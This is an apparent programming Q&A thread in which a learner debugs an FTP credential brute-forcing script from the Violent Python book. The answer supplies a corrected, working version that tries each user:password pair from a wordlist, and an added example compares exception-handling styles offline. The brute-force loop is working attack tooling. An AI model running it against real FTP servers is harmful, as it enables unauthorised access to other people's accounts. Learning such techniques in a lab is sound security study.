I'm following the code in the Violent Python book. This is what I have here to test brute-forcing FTP:
import ftplib

def bruteLogin(hostname, passwdFile):
    pF = open(passwdFile, 'r')
    for line in pF.readlines():
        userName = line.split(':')[0]
        passWord = line.split(':')[1].strip('\r').strip('\n')
        print("[+] Trying: "+userName+"/"+passWord)
        try:
            ftp = ftplib.FTP(hostname)
            ftp.login(userName, passWord)
            print('\n[*] ' + str(hostname) +\
                ' FTP Logon Succeeded: '+userName+"/"+passWord)
            ftp.quit()
            return (userName, passWord)
        except Exception as e:
            pass
        print('\n[-] Could not brute force FTP credentials.')
        return (None, None)

host = '192.168.95.179'
passwdFile = 'C:/Users/Andrew/Documents/Python Stuff/userpass.txt'
bruteLogin(host, passwdFile)
With an example 'userpass.txt' consisting of:
administrator:password
admin:12345
root:secret
guest:guest
root:root
When run (I'm using Python 3.4, by the way), it should return a result like this:
[+] Trying: administrator/password
[+] Trying: admin/12345
[+] Trying: root/secret
[+] Trying: guest/guest
[*] 192.168.95.179 FTP Logon Succeeded: guest/guest
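The above is an example of a successful login, of course. When I actually run it, it returns "Could not brute force FTP credentials", but it seems to try only the first line of the text file, rather than passing over the exception and trying the other lines as the book describes. Any ideas?

Answer 0 (score: 0)

The "Could not..." line should only be printed after the loop has finished. Your current code does this on every iteration, so it is printed if the first attempt is unsuccessful.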
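Also, it is easier to reason about exceptions if you keep the try block as short as possible and the exception you catch as specific as possible. This reduces the cases in which an exception gets handled and lets all other, unrelated exceptions blow up and become visible, which helps you debug your code in places where you don't expect exceptions to be raised. Your code could look like this: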
def bruteLogin(hostname, passwdFile):
    pF = open(passwdFile, 'r')
    ftp = ftplib.FTP(hostname) # reuse the connection
    for line in pF.readlines():
        userName, passWord = line.split(':', 1) # split only once, the pw may contain a :
        passWord = passWord.strip('\r\n') # strip any of the two characters
        print("[+] Trying: {}/{}".format(userName, passWord))
        try:
            ftp.login(userName, passWord)
        except ftplib.error_perm:
            continue
        else:
            print('\n[*] {} FTP Logon Succeeded: {}/{}'.format(hostname, userName, passWord))
            ftp.quit()
            return userName, passWord
    print('\n[-] Could not brute force FTP credentials.')
    return None, None
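
The difference between the question's `except Exception: pass` and the answer's `except ftplib.error_perm`, shown as an added example that is not part of the original answer. The three `*_login` functions are constructed stand-ins for `ftplib.FTP.login` so that it runs offline, and `broad_attempt`, `narrow_attempt`, `classify` and `compare` are hypothetical helper names.

```python
import ftplib

def broad_attempt(login, user, password):
    """Question-style handling: every exception is treated as a rejected login."""
    try:
        login(user, password)
    except Exception:
        return False
    return True

def narrow_attempt(login, user, password):
    """Answer-style handling: only a permanent FTP error reply (5xx) means 'rejected'."""
    try:
        login(user, password)
    except ftplib.error_perm:
        return False
    return True

# Constructed stand-ins for ftplib.FTP.login (assumption: no real server is contacted).
def rejecting_login(user, password):
    raise ftplib.error_perm("530 Login incorrect.")

def unreachable_login(user, password):
    raise ConnectionRefusedError("constructed: no FTP service listening")

def buggy_login(user, password):
    return undefined_name  # constructed programming error, raises NameError

def classify(attempt, login):
    """What the caller sees: 'accepted', 'rejected', or the exception type that surfaced."""
    try:
        return "accepted" if attempt(login, "guest", "guest") else "rejected"
    except Exception as exc:
        return type(exc).__name__

def compare():
    """Map each failure cause to (broad result, narrow result)."""
    causes = {
        "wrong password": rejecting_login,
        "server unreachable": unreachable_login,
        "bug in code": buggy_login,
    }
    return {name: (classify(broad_attempt, fn), classify(narrow_attempt, fn))
            for name, fn in causes.items()}

if __name__ == "__main__":
    for name, (broad, narrow) in compare().items():
        print("{:20} broad={:10} narrow={}".format(name, broad, narrow))
```

With the broad handler all three causes look like a rejected login, which is why the question's script reports failure no matter what actually went wrong; with the narrow handler the connection error and the programming error surface under their own names.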